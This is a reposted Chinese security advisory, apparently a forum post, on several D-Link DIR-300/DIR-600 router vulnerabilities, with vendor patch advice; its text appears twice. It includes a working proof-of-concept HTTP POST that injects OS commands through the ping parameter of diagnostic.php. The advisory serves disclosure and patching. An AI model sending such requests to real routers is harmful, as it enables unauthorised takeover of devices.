-
-
[转帖]D-Link DIR-600和DIR-300多个安全漏洞
-
发表于: 2013-4-28 11:53 1378
-
受影响系统:
D-Link DIR-300
D-Link DIR-600
描述:
BUGTRAQ ID: 59405
D-Link DIR-600和DIR-300均是无线路由器产品。
D-Link DIR-600和DIR-300在实现上存在多个安全漏洞,包括多个命令注入漏洞、跨站请求伪造漏洞、跨站脚本漏洞、密码加密漏洞、信息泄露漏洞、HTTP标头注入漏洞、安全措施绕过漏洞,恶意用户可利用这些漏洞泄露某些系统信息、解密已存储密码、在受影响设备上下文中执行任意命令、窃取cookie身份验证凭证、在用户会话上下文中执行未授权操作、重定向用户到任意站点、HTTP请求走私并控制受影响设备。
1、设备没有限制对router_info.xml的访问,通过错误消息可泄露完整路径;
2、设备没有限制对DevInfo.txt和version.txt的访问,可造成某些设备信息泄露;
3、设备没有限制对command.php的访问,通过特制的HTTP请求,可导致执行任意shell命令。影响范围:D-Link DIR-300 v2.12和2.13、D-Link DIR-600 v2.12b02, 2.13b01, 2.14b01.
4、设备没有限制对diagnostic.php的访问,通过特制的HTTP请求,可导致执行某些OS命令。影响范围:D-Link DIR-300 v2.13b01、D-Link DIR-600 v2.15b01之前版本
<*来源:Michael Messner (michae.messner@integralis.com)
链接:http://www.securelist.com/en/advisories/52080
http://www.s3cur1ty.de/m1adv2013-003
http://www.s3cur1ty.de/m1adv2013-017
*>
测试方法:
警 告
以下程序(方法)可能带有攻击性,仅供安全研究与教学之用。使用者风险自负!
Michael Messner (michae.messner@integralis.com)提供了如下测试方法:
* OS命令注入:
POST /diagnostic.php HTTP/1.1
Host: xxxx
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:16.0) Gecko/20100101 Firefox/16.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: de-de,de;q=0.8,en-us;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Proxy-Connection: keep-alive
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
Referer: http://xxxx/
Content-Length: 41
Cookie: uid=hfaiGzkB4z
Pragma: no-cache
Cache-Control: no-cache
act=ping&dst=%26%20COMMAND%26
建议:
厂商补丁:
D-Link
------
目前厂商已经发布了升级补丁以修复这个安全问题,请到厂商的主页下载:
http://www.dlink.com/uk/en/support/security
D-Link DIR-300
D-Link DIR-600
描述:
BUGTRAQ ID: 59405
D-Link DIR-600和DIR-300均是无线路由器产品。
D-Link DIR-600和DIR-300在实现上存在多个安全漏洞,包括多个命令注入漏洞、跨站请求伪造漏洞、跨站脚本漏洞、密码加密漏洞、信息泄露漏洞、HTTP标头注入漏洞、安全措施绕过漏洞,恶意用户可利用这些漏洞泄露某些系统信息、解密已存储密码、在受影响设备上下文中执行任意命令、窃取cookie身份验证凭证、在用户会话上下文中执行未授权操作、重定向用户到任意站点、HTTP请求走私并控制受影响设备。
1、设备没有限制对router_info.xml的访问,通过错误消息可泄露完整路径;
2、设备没有限制对DevInfo.txt和version.txt的访问,可造成某些设备信息泄露;
3、设备没有限制对command.php的访问,通过特制的HTTP请求,可导致执行任意shell命令。影响范围:D-Link DIR-300 v2.12和2.13、D-Link DIR-600 v2.12b02, 2.13b01, 2.14b01.
4、设备没有限制对diagnostic.php的访问,通过特制的HTTP请求,可导致执行某些OS命令。影响范围:D-Link DIR-300 v2.13b01、D-Link DIR-600 v2.15b01之前版本
<*来源:Michael Messner (michae.messner@integralis.com)
链接:http://www.securelist.com/en/advisories/52080
http://www.s3cur1ty.de/m1adv2013-003
http://www.s3cur1ty.de/m1adv2013-017
*>
测试方法:
警 告
以下程序(方法)可能带有攻击性,仅供安全研究与教学之用。使用者风险自负!
Michael Messner (michae.messner@integralis.com)提供了如下测试方法:
* OS命令注入:
POST /diagnostic.php HTTP/1.1
Host: xxxx
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:16.0) Gecko/20100101 Firefox/16.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: de-de,de;q=0.8,en-us;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Proxy-Connection: keep-alive
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
Referer: http://xxxx/
Content-Length: 41
Cookie: uid=hfaiGzkB4z
Pragma: no-cache
Cache-Control: no-cache
act=ping&dst=%26%20COMMAND%26
建议:
厂商补丁:
D-Link
------
目前厂商已经发布了升级补丁以修复这个安全问题,请到厂商的主页下载:
http://www.dlink.com/uk/en/support/security
赞赏
看原图
赞赏
雪币:
留言: